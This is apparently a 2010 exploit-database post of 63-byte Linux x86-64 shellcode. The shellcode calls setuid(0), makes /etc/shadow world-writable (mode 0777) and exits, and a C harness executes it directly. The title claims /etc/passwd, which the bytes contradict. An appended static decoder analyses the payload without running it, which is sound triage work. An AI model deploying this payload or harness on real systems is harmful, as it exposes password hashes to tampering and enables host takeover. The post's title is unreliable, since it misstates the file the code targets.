
linux/x86-64 setuid(0) & chmod ("/etc/passwd",

Posted on 17 June 2010

=======================================================================
linux/x86-64 setuid(0) & chmod ("/etc/passwd", 0777) & exit(0) 63 bytes
=======================================================================

/*

Title:   Linux/x86-64 - setuid(0) & chmod ("/etc/passwd", 0777) & exit(0) - 63 bytes
Date:    2010-06-17
Tested:  Archlinux x86_64 k2.6.33

Author:  Jonathan Salwan
Web:     http://shell-storm.org | http://twitter.com/shell_storm

! Database of shellcodes http://www.shell-storm.org/shellcode/


<-- _setuid(0) -->
  400078:  48 31 ff                 xor    %rdi,%rdi
  40007b:  48 31 c0                 xor    %rax,%rax
  40007e:  b0 69                    mov    $0x69,%al
  400080:  0f 05                    syscall

<-- _chmod("/etc/shadow", 0777) -->
  400082:  48 31 d2                 xor    %rdx,%rdx
  400085:  66 be ff 01              mov    $0x1ff,%si
  400089:  48 bb ff ff ff ff ff     mov    $0x776f64ffffffffff,%rbx
  400090:  64 6f 77
  400093:  48 c1 eb 28              shr    $0x28,%rbx
  400097:  53                       push   %rbx
  400098:  48 bb 2f 65 74 63 2f     mov    $0x6168732f6374652f,%rbx
  40009f:  73 68 61
  4000a2:  53                       push   %rbx
  4000a3:  48 89 e7                 mov    %rsp,%rdi
  4000a6:  48 31 c0                 xor    %rax,%rax
  4000a9:  b0 5a                    mov    $0x5a,%al
  4000ab:  0f 05                    syscall

<-- _exit(0) -->
  4000ad:  48 31 ff                 xor    %rdi,%rdi
  4000b0:  48 31 c0                 xor    %rax,%rax
  4000b3:  b0 3c                    mov    $0x3c,%al
  4000b5:  0f 05                    syscall

*/

#include <stdio.h>
#include <string.h>   /* strlen() */

/* The 63 payload bytes from the disassembly above. */
char *SC = "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05"
           "\x48\x31\xd2\x66\xbe\xff\x01\x48\xbb\xff"
           "\xff\xff\xff\xff\x64\x6f\x77\x48\xc1\xeb"
           "\x28\x53\x48\xbb\x2f\x65\x74\x63\x2f\x73"
           "\x68\x61\x53\x48\x89\xe7\x48\x31\xc0\xb0"
           "\x5a\x0f\x05\x48\x31\xff\x48\x31\xc0\xb0"
           "\x3c\x0f\x05";

/* Test harness: print the payload length, then call into it. */
int main(void)
{
    fprintf(stdout, "Length: %zu\n", strlen(SC));
    (*(void(*)()) SC)();
    return 0;
}

# Inj3ct0r.com [2010-06-17]
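For triage, the payload can be read without running it. The following is an added example, not part of the original listing or the author's code: a static walk over the 63 bytes that recovers the syscall numbers, the mode loaded into %si and the string built on the stack, which shows the target is /etc/shadow although the title says /etc/passwd. The names `SC_BYTES`, `struct triage` and `triage_shellcode` are hypothetical, and the decoder recognises only the instruction encodings that occur in this listing.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* The 63 bytes from the listing, kept as inert data; nothing here executes them. */
static const uint8_t SC_BYTES[] = {
    0x48,0x31,0xff,0x48,0x31,0xc0,0xb0,0x69,0x0f,0x05,0x48,0x31,0xd2,0x66,0xbe,0xff,
    0x01,0x48,0xbb,0xff,0xff,0xff,0xff,0xff,0x64,0x6f,0x77,0x48,0xc1,0xeb,0x28,0x53,
    0x48,0xbb,0x2f,0x65,0x74,0x63,0x2f,0x73,0x68,0x61,0x53,0x48,0x89,0xe7,0x48,0x31,
    0xc0,0xb0,0x5a,0x0f,0x05,0x48,0x31,0xff,0x48,0x31,0xc0,0xb0,0x3c,0x0f,0x05 };
/* Hypothetical result type: syscall numbers in order, %si immediate, stack string. */
struct triage { int nsys, sysno[8]; unsigned mode; char path[65]; };
/* Linear walk over only the encodings this listing uses; -1 on any other opcode. */
int triage_shellcode(const uint8_t *p, size_t n, struct triage *out)
{
    uint64_t rax = 0, rbx = 0;
    uint8_t stack[64] = {0};
    size_t i = 0, sp = sizeof stack;
    memset(out, 0, sizeof *out);
    while (i < n) {
        size_t left = n - i;
        if (left >= 3 && p[i] == 0x48 && p[i+1] == 0x31) {           /* xor r64,r64 */
            if (p[i+2] == 0xc0) rax = 0;                             /* %rax,%rax only */
            i += 3;
        } else if (left >= 3 && !memcmp(p + i, "\x48\x89\xe7", 3)) { /* mov %rsp,%rdi */
            i += 3;
        } else if (left >= 2 && p[i] == 0xb0) {                      /* mov $imm8,%al */
            rax = (rax & ~0xffULL) | p[i+1]; i += 2;
        } else if (left >= 2 && p[i] == 0x0f && p[i+1] == 0x05) {    /* syscall */
            if (out->nsys < 8) out->sysno[out->nsys++] = (int)rax;
            i += 2;
        } else if (left >= 4 && p[i] == 0x66 && p[i+1] == 0xbe) {    /* mov $imm16,%si */
            out->mode = p[i+2] | (unsigned)p[i+3] << 8; i += 4;
        } else if (left >= 10 && p[i] == 0x48 && p[i+1] == 0xbb) {   /* movabs $imm64,%rbx */
            for (int k = 9; k >= 2; k--) rbx = (rbx << 8) | p[i+k];
            i += 10;
        } else if (left >= 4 && !memcmp(p + i, "\x48\xc1\xeb", 3)) { /* shr $imm8,%rbx */
            rbx >>= (p[i+3] & 63); i += 4;
        } else if (p[i] == 0x53 && sp >= 8) {                        /* push %rbx */
            sp -= 8; i += 1;
            for (int k = 0; k < 8; k++) stack[sp+k] = (uint8_t)(rbx >> (8 * k));
        } else return -1;
    }
    memcpy(out->path, stack + sp, sizeof stack - sp);  /* lowest address first */
    return 0;
}
int main(void) {
    struct triage t;
    if (triage_shellcode(SC_BYTES, sizeof SC_BYTES, &t)) return 1;
    printf("syscalls %d,%d,%d on %s mode %o\n", t.sysno[0], t.sysno[1], t.sysno[2], t.path, t.mode);
}
```

On x86-64 Linux the three recovered numbers are setuid (105), chmod (90) and exit (60), so a world-writable /etc/shadow is the artifact to look for on a host where this payload may have run.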

 
